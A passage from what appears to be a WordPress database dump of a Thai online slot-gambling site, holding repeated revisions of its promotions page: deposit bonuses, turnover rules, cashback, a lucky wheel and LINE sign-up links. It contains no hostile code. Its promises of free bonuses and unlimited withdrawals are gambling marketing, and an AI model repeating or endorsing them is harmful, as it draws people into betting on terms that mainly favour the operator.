เครดิต <strong data-start=\"310\" data-end=\"318\">หรือ</strong> สปินเพิ่ม +1)</li></ul> <a href=\"https://line.me/R/ti/p/@036terdw\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>วิธีการรับโปรโมชั่น</h2> <ul><li data-start=\"2531\" data-end=\"2570\">เข้าสู่ระบบ → ไปที่เมนู <strong data-start=\"2555\" data-end=\"2568\">โปรโมชั่น</strong></li><li data-start=\"2574\" data-end=\"2643\">เลือกโปรที่ต้องการ และกด <strong data-start=\"2599\" data-end=\"2614\">กดรับสิทธิ์</strong> (หรือแจ้งแอดมินตามที่ระบุ)</li><li data-start=\"2647\" data-end=\"2706\">ระบบเครดิตเข้า <strong data-start=\"2662\" data-end=\"2675\">อัตโนมัติ</strong> / หรือหลังยืนยันสิทธิ์สำเร็จ</li><li data-start=\"2710\" data-end=\"2741\">ตรวจสอบสถานะได้ในประวัติธุรกรรม</li></ul> <h2>เงื่อนไข</h2> <ul><li data-start=\"2092\" data-end=\"2176\">โปรทั้งหมดสำหรับ <strong data-start=\"2109\" data-end=\"2138\">1 ผู้ใช้/1 อุปกรณ์/1 ไอพี</strong> ห้ามใช้หลายบัญชีหรือทุจริตทุกรูปแบบ</li><li data-start=\"2179\" data-end=\"2301\">การนับเทิร์นและการถอน <strong data-start=\"2201\" data-end=\"2237\">เป็นไปตามระบบอัตโนมัติของ naijan</strong> เฉพาะหมวดสล็อต (หากมีหมวดที่ไม่นับเทิร์น ระบบจะแจ้งในหน้าเกม)</li><li data-start=\"2304\" data-end=\"2404\">เมื่อกดรับโปรใดโปรหนึ่ง ถือว่ายอมรับเงื่อนไขของโปรนั้น ๆ และ <strong data-start=\"2365\" data-end=\"2385\">ไม่สามารถซ้อนโปร</strong> ยกเว้นที่ระบุไว้</li><li data-start=\"2407\" data-end=\"2499\">naijan <strong data-start=\"2414\" data-end=\"2445\">ขอสงวนสิทธิ์ปรับปรุง/ยกเลิก</strong> โปรโมชั่น และปฏิเสธการจ่ายหากตรวจพบทุจริต/ผิดเงื่อนไข</li></ul>','โปรโมชั่น','','inherit','closed','closed','','27-revision-v1','','','2025-10-23 12:46:02','2025-10-23 12:46:02','',27,'https://megabet333.biz/?p=155',0,'revision','',0),(156,3,'2025-10-23 13:37:13','2025-10-23 13:37:13','','Lucky_wheel_-_Megabet333-Biz','','inherit','','closed','','lucky_wheel_-_megabet333-biz','','','2025-10-23 13:37:13','2025-10-23 13:37:13','',27,'https://megabet333.biz/wp-content/uploads/2025/10/Lucky_wheel_-_Megabet333-Biz.webp',0,'attachment','image/webp',0),(157,3,'2025-10-23 13:37:14','2025-10-23 13:37:14','','79_get_200_7turn_-_Megabet333-Biz','','inherit','','closed','','79_get_200_7turn_-_megabet333-biz','','','2025-10-23 13:37:14','2025-10-23 13:37:14','',27,'https://megabet333.biz/wp-content/uploads/2025/10/79_get_200_7turn_-_Megabet333-Biz.webp',0,'attachment','image/webp',0),(158,3,'2025-10-23 13:37:15','2025-10-23 13:37:15','','Free_bonus_100_-_Megabet333-Biz','','inherit','','closed','','free_bonus_100_-_megabet333-biz','','','2025-10-23 13:37:15','2025-10-23 13:37:15','',27,'https://megabet333.biz/wp-content/uploads/2025/10/Free_bonus_100_-_Megabet333-Biz.webp',0,'attachment','image/webp',0),(159,3,'2025-10-23 13:37:16','2025-10-23 13:37:16','','HBD_-_Megabet333-Biz','','inherit','','closed','','hbd_-_megabet333-biz','','','2025-10-23 13:37:16','2025-10-23 13:37:16','',27,'https://megabet333.biz/wp-content/uploads/2025/10/HBD_-_Megabet333-Biz.webp',0,'attachment','image/webp',0),(160,3,'2025-10-23 13:37:16','2025-10-23 13:37:16','','Reward_10_-_Megabet333-Biz','','inherit','','closed','','reward_10_-_megabet333-biz','','','2025-10-23 13:37:16','2025-10-23 13:37:16','',27,'https://megabet333.biz/wp-content/uploads/2025/10/Reward_10_-_Megabet333-Biz.webp',0,'attachment','image/webp',0),(161,3,'2025-10-23 13:37:17','2025-10-23 13:37:17','','20_get_100_-_Megabet333-Biz','','inherit','','closed','','20_get_100_-_megabet333-biz','','','2025-10-23 13:37:17','2025-10-23 13:37:17','',27,'https://megabet333.biz/wp-content/uploads/2025/10/20_get_100_-_Megabet333-Biz.webp',0,'attachment','image/webp',0),(162,3,'2025-10-23 13:38:54','2025-10-23 13:38:54','<h1>โปรโมชั่น Megabet333 รวมโปรสล็อต โบนัสฟรี 100% ถอนไม่อั้น</h1> <p data-start=\"346\" data-end=\"760\">ถ้าพูดถึงสิ่งที่ดึงดูดผู้เล่นให้เข้ามาเล่นสล็อตออนไลน์ megabet มากที่สุดก็คงหนีไม่พ้น “<strong>โปรโมชั่นสล็อต</strong>” เพราะเป็นตัวช่วยสำคัญที่ทำให้ผู้เล่นได้ทั้งความคุ้มค่าและความสนุกไปพร้อมกัน เว็บพนันออนไลน์ยุคใหม่จึงแข่งขันกันออกโปรโมชั่นเด็ด ๆ เพื่อเอาใจนักเดิมพันทุกกลุ่ม ไม่ว่าจะเป็นมือใหม่หรือผู้เล่นประจำ ต่างก็สามารถรับสิทธิ์พิเศษได้เต็มที่ ยิ่งถ้าเลือกเว็บที่มีโปรหลากหลายและแจกจริง ยิ่งช่วยให้การเล่นสล็อตสนุกมากขึ้นกว่าที่เคย เว็บพนันออนไลน์ในปัจจุบันไม่เพียงแต่ให้บริการเกมสล็อตจากค่ายชั้นนำเท่านั้น แต่ยังมาพร้อมโปรโมชั่นสล็อตที่ครอบคลุมทุกช่วงเวลา ตั้งแต่สมัครสมาชิก ฝากเงิน ถอนเงิน ไปจนถึงโปรคืนยอดเสีย ซึ่งทั้งหมดนี้ถือเป็นโอกาสทองสำหรับผู้เล่นที่อยากเพิ่มทุนแบบไม่ต้องลงทุนเยอะ แถมยังช่วยให้ปั่นสล็อตได้ต่อเนื่องแบบไม่มีสะดุด</p> <h2>โปร 20 รับ 100</h2> <p style=\"text-align: center;\">ฝาก 20 → รับเพิ่ม 80 = รวม 100 / ทำเทิร์น 8 เท่า / ถอนได้สูงสุด 200</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น</strong> 8 เท่า ของยอดรวม</li><li>เฉพาะสล็อตเท่านั้น</li><li>ห้ามซื้อฟรีสปิน</li></ul> <a href=\"https://line.me/R/ti/p/@036terdw\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>โปร 79 รับ 200</h2> <p style=\"text-align: center;\">ฝาก 79 → รับเพิ่ม 121 = รวม 200 / ทำเทิร์น 7 เท่า / ถอนได้สูงสุด 600</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น</strong> 7 เท่า ของยอดรวม</li><li data-start=\"798\" data-end=\"837\">เฉพาะสล็อตเท่านั้น</li><li data-start=\"798\" data-end=\"837\">ห้ามซื้อฟรีสปิน</li></ul> <a href=\"https://line.me/R/ti/p/@036terdw\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>โปรรับโมบัส 100%</h2> <p style=\"text-align: center;\" data-start=\"696\" data-end=\"740\"><strong data-start=\"696\" data-end=\"711\">คุ้มสองเด้ง</strong> เติมเท่าไรรับเพิ่มเท่านั้น</p><ul><li data-start=\"696\" data-end=\"740\"><strong data-start=\"743\" data-end=\"758\">100 รับ 200</strong></li><li data-start=\"696\" data-end=\"740\"><strong data-start=\"763\" data-end=\"780\">500 รับ 1,000</strong></li></ul><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"798\" data-end=\"813\">ทำ 6 เทิร์น</strong>, <strong data-start=\"815\" data-end=\"835\">ถอนสูงสุด 3 เท่า</strong></li><li data-start=\"798\" data-end=\"837\">ก่อนถอน <strong data-start=\"848\" data-end=\"886\">ระบบตัดเครดิตโปรโมชั่น (ส่วนโบนัส)</strong> ออกโดยอัตโนมัติ เหลือยอดเงินจริงสำหรับถอน</li><li data-start=\"798\" data-end=\"837\">จำกัดสิทธิ์ <strong data-start=\"945\" data-end=\"967\">1 ครั้ง/วัน/ผู้ใช้</strong></li></ul> <a href=\"https://line.me/R/ti/p/@036terdw\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>Happy Birthday Bonus </h2> <p style=\"text-align: center;\" data-start=\"1415\" data-end=\"1466\">🎁 ฉลองเดือนเกิด รับของขวัญตามยอดฝากสะสมภายในเดือนนั้น <br />(รับได้ตลอดทั้งเดือนเกิด)</p><ul><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1480\" data-end=\"1496\">3,000 ขึ้นไป</strong> → <strong data-start=\"1499\" data-end=\"1513\">รับฟรี 300</strong></li><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1529\" data-end=\"1542\">500–2,999</strong> → <strong data-start=\"1545\" data-end=\"1555\">รับ 50</strong></li><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1571\" data-end=\"1586\">ไม่เกิน 500</strong> → <strong data-start=\"1589\" data-end=\"1616\">ฝากเท่าไร รับเพิ่ม 100%</strong></li></ul><p data-start=\"271\" data-end=\"387\"><strong data-start=\"371\" data-end=\"387\">สรุปเงื่อนไข</strong></p><ul><li data-start=\"1634\" data-end=\"1680\"><strong data-start=\"1634\" data-end=\"1653\">ทำเทิร์น 5 เท่า</strong>, <strong data-start=\"1655\" data-end=\"1678\">ถอนได้สูงสุด 3 เท่า</strong></li><li data-start=\"1634\" data-end=\"1680\">ยืนยันสิทธิ์โดย <strong data-start=\"1699\" data-end=\"1727\">แจ้งบัตรประชาชนกับแอดมิน</strong></li></ul> <a href=\"https://line.me/R/ti/p/@036terdw\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>คืนยอดเสีย 10%</h2> <p style=\"text-align: center;\" data-start=\"1088\" data-end=\"1118\">เสียไม่เสียเปล่า! ระบบ <strong data-start=\"1844\" data-end=\"1878\">แปลงยอดเสียเป็นแต้ม Reward 10%</strong> <br />นำแต้มไปลุ้นใหมหรือจะแลกของรางวัลก็ได้ ในหน้าแลกแต้ม</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"1936\" data-end=\"1990\">คิดเป็นเปอร์เซ็นต์จากยอดเสียสุทธิ ตามรอบที่ระบบกำหนด</li><li data-start=\"1936\" data-end=\"1990\">แต้มไม่ใช่เงินสดโดยตรง ต้องนำไปแลกตามรายการที่เปิดให้แลกในขณะนั้น</li></ul> <a href=\"https://line.me/R/ti/p/@036terdw\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>Lucky Wheel กงล้อเสี่ยงโชค </h2> <p style=\"text-align: center;\" data-start=\"1415\" data-end=\"1466\">หมุนลุ้นรางวัลทุกวันด้วยแต้ม <strong data-start=\"75\" data-end=\"85\">Reward</strong> ของคุณ <br />เปลี่ยนแต้มเป็นสิทธิ์หมุน แล้วรับเครดิตโบนัสทันทีหลังจบการหมุน</p><p data-start=\"271\" data-end=\"387\"><strong data-start=\"371\" data-end=\"387\">สรุปเงื่อนไข</strong></p><ul><li data-start=\"197\" data-end=\"252\"><strong data-start=\"197\" data-end=\"250\">20 / 50 / 100 / 150 / 200 / 250 / 300 เครดิตโบนัส</strong></li><li data-start=\"197\" data-end=\"252\"><strong data-start=\"255\" data-end=\"275\">🎁 Mystery Prize</strong> สุ่มรางวัลพิเศษ (เช่น 500 เครดิต <strong data-start=\"310\" data-end=\"318\">หรือ</strong> สปินเพิ่ม +1)</li></ul> <a href=\"https://line.me/R/ti/p/@036terdw\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>วิธีการรับโปรโมชั่น</h2> <ul><li data-start=\"2531\" data-end=\"2570\">เข้าสู่ระบบ → ไปที่เมนู <strong data-start=\"2555\" data-end=\"2568\">โปรโมชั่น</strong></li><li data-start=\"2574\" data-end=\"2643\">เลือกโปรที่ต้องการ และกด <strong data-start=\"2599\" data-end=\"2614\">กดรับสิทธิ์</strong> (หรือแจ้งแอดมินตามที่ระบุ)</li><li data-start=\"2647\" data-end=\"2706\">ระบบเครดิตเข้า <strong data-start=\"2662\" data-end=\"2675\">อัตโนมัติ</strong> / หรือหลังยืนยันสิทธิ์สำเร็จ</li><li data-start=\"2710\" data-end=\"2741\">ตรวจสอบสถานะได้ในประวัติธุรกรรม</li></ul> <h2>เงื่อนไข</h2> <ul><li data-start=\"2092\" data-end=\"2176\">โปรทั้งหมดสำหรับ <strong data-start=\"2109\" data-end=\"2138\">1 ผู้ใช้/1 อุปกรณ์/1 ไอพี</strong> ห้ามใช้หลายบัญชีหรือทุจริตทุกรูปแบบ</li><li data-start=\"2179\" data-end=\"2301\">การนับเทิร์นและการถอน <strong data-start=\"2201\" data-end=\"2237\">เป็นไปตามระบบอัตโนมัติของ naijan</strong> เฉพาะหมวดสล็อต (หากมีหมวดที่ไม่นับเทิร์น ระบบจะแจ้งในหน้าเกม)</li><li data-start=\"2304\" data-end=\"2404\">เมื่อกดรับโปรใดโปรหนึ่ง ถือว่ายอมรับเงื่อนไขของโปรนั้น ๆ และ <strong data-start=\"2365\" data-end=\"2385\">ไม่สามารถซ้อนโปร</strong> ยกเว้นที่ระบุไว้</li><li data-start=\"2407\" data-end=\"2499\">naijan <strong data-start=\"2414\" data-end=\"2445\">ขอสงวนสิทธิ์ปรับปรุง/ยกเลิก</strong> โปรโมชั่น และปฏิเสธการจ่ายหากตรวจพบทุจริต/ผิดเงื่อนไข</li></ul>','โปรโมชั่น','','inherit','closed','closed','','27-revision-v1','','','2025-10-23 13:38:54','2025-10-23 13:38:54','',27,'https://megabet333.biz/?p=162',0,'revision','',0),(163,3,'2025-10-23 13:38:54','2025-10-23 13:38:54','<h1>โปรโมชั่น Megabet333 รวมโปรสล็อต โบนัสฟรี 100% ถอนไม่อั้น</h1> <p data-start=\"346\" data-end=\"760\">ถ้าพูดถึงสิ่งที่ดึงดูดผู้เล่นให้เข้ามาเล่นสล็อตออนไลน์ megabet มากที่สุดก็คงหนีไม่พ้น “<strong>โปรโมชั่นสล็อต</strong>” เพราะเป็นตัวช่วยสำคัญที่ทำให้ผู้เล่นได้ทั้งความคุ้มค่าและความสนุกไปพร้อมกัน เว็บพนันออนไลน์ยุคใหม่จึงแข่งขันกันออกโปรโมชั่นเด็ด ๆ เพื่อเอาใจนักเดิมพันทุกกลุ่ม ไม่ว่าจะเป็นมือใหม่หรือผู้เล่นประจำ ต่างก็สามารถรับสิทธิ์พิเศษได้เต็มที่ ยิ่งถ้าเลือกเว็บที่มีโปรหลากหลายและแจกจริง ยิ่งช่วยให้การเล่นสล็อตสนุกมากขึ้นกว่าที่เคย เว็บพนันออนไลน์ในปัจจุบันไม่เพียงแต่ให้บริการเกมสล็อตจากค่ายชั้นนำเท่านั้น แต่ยังมาพร้อมโปรโมชั่นสล็อตที่ครอบคลุมทุกช่วงเวลา ตั้งแต่สมัครสมาชิก ฝากเงิน ถอนเงิน ไปจนถึงโปรคืนยอดเสีย ซึ่งทั้งหมดนี้ถือเป็นโอกาสทองสำหรับผู้เล่นที่อยากเพิ่มทุนแบบไม่ต้องลงทุนเยอะ แถมยังช่วยให้ปั่นสล็อตได้ต่อเนื่องแบบไม่มีสะดุด</p> <h2>โปร 20 รับ 100</h2> <p style=\"text-align: center;\">ฝาก 20 → รับเพิ่ม 80 = รวม 100 / ทำเทิร์น 8 เท่า / ถอนได้สูงสุด 200</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น</strong> 8 เท่า ของยอดรวม</li><li>เฉพาะสล็อตเท่านั้น</li><li>ห้ามซื้อฟรีสปิน</li></ul> <a href=\"https://line.me/R/ti/p/@036terdw\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>โปร 79 รับ 200</h2> <p style=\"text-align: center;\">ฝาก 79 → รับเพิ่ม 121 = รวม 200 / ทำเทิร์น 7 เท่า / ถอนได้สูงสุด 600</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น</strong> 7 เท่า ของยอดรวม</li><li data-start=\"798\" data-end=\"837\">เฉพาะสล็อตเท่านั้น</li><li data-start=\"798\" data-end=\"837\">ห้ามซื้อฟรีสปิน</li></ul> <a href=\"https://line.me/R/ti/p/@036terdw\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>โปรรับโมบัส 100%</h2> <p style=\"text-align: center;\" data-start=\"696\" data-end=\"740\"><strong data-start=\"696\" data-end=\"711\">คุ้มสองเด้ง</strong> เติมเท่าไรรับเพิ่มเท่านั้น</p><ul><li data-start=\"696\" data-end=\"740\"><strong data-start=\"743\" data-end=\"758\">100 รับ 200</strong></li><li data-start=\"696\" data-end=\"740\"><strong data-start=\"763\" data-end=\"780\">500 รับ 1,000</strong></li></ul><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"798\" data-end=\"813\">ทำ 6 เทิร์น</strong>, <strong data-start=\"815\" data-end=\"835\">ถอนสูงสุด 3 เท่า</strong></li><li data-start=\"798\" data-end=\"837\">ก่อนถอน <strong data-start=\"848\" data-end=\"886\">ระบบตัดเครดิตโปรโมชั่น (ส่วนโบนัส)</strong> ออกโดยอัตโนมัติ เหลือยอดเงินจริงสำหรับถอน</li><li data-start=\"798\" data-end=\"837\">จำกัดสิทธิ์ <strong data-start=\"945\" data-end=\"967\">1 ครั้ง/วัน/ผู้ใช้</strong></li></ul> <a href=\"https://line.me/R/ti/p/@036terdw\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>Happy Birthday Bonus </h2> <p style=\"text-align: center;\" data-start=\"1415\" data-end=\"1466\">🎁 ฉลองเดือนเกิด รับของขวัญตามยอดฝากสะสมภายในเดือนนั้น <br />(รับได้ตลอดทั้งเดือนเกิด)</p><ul><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1480\" data-end=\"1496\">3,000 ขึ้นไป</strong> → <strong data-start=\"1499\" data-end=\"1513\">รับฟรี 300</strong></li><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1529\" data-end=\"1542\">500–2,999</strong> → <strong data-start=\"1545\" data-end=\"1555\">รับ 50</strong></li><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1571\" data-end=\"1586\">ไม่เกิน 500</strong> → <strong data-start=\"1589\" data-end=\"1616\">ฝากเท่าไร รับเพิ่ม 100%</strong></li></ul><p data-start=\"271\" data-end=\"387\"><strong data-start=\"371\" data-end=\"387\">สรุปเงื่อนไข</strong></p><ul><li data-start=\"1634\" data-end=\"1680\"><strong data-start=\"1634\" data-end=\"1653\">ทำเทิร์น 5 เท่า</strong>, <strong data-start=\"1655\" data-end=\"1678\">ถอนได้สูงสุด 3 เท่า</strong></li><li data-start=\"1634\" data-end=\"1680\">ยืนยันสิทธิ์โดย <strong data-start=\"1699\" data-end=\"1727\">แจ้งบัตรประชาชนกับแอดมิน</strong></li></ul> <a href=\"https://line.me/R/ti/p/@036terdw\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>คืนยอดเสีย 10%</h2> <p style=\"text-align: center;\" data-start=\"1088\" data-end=\"1118\">เสียไม่เสียเปล่า! ระบบ <strong data-start=\"1844\" data-end=\"1878\">แปลงยอดเสียเป็นแต้ม Reward 10%</strong> <br />นำแต้มไปลุ้นใหมหรือจะแลกของรางวัลก็ได้ ในหน้าแลกแต้ม</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"1936\" data-end=\"1990\">คิดเป็นเปอร์เซ็นต์จากยอดเสียสุทธิ 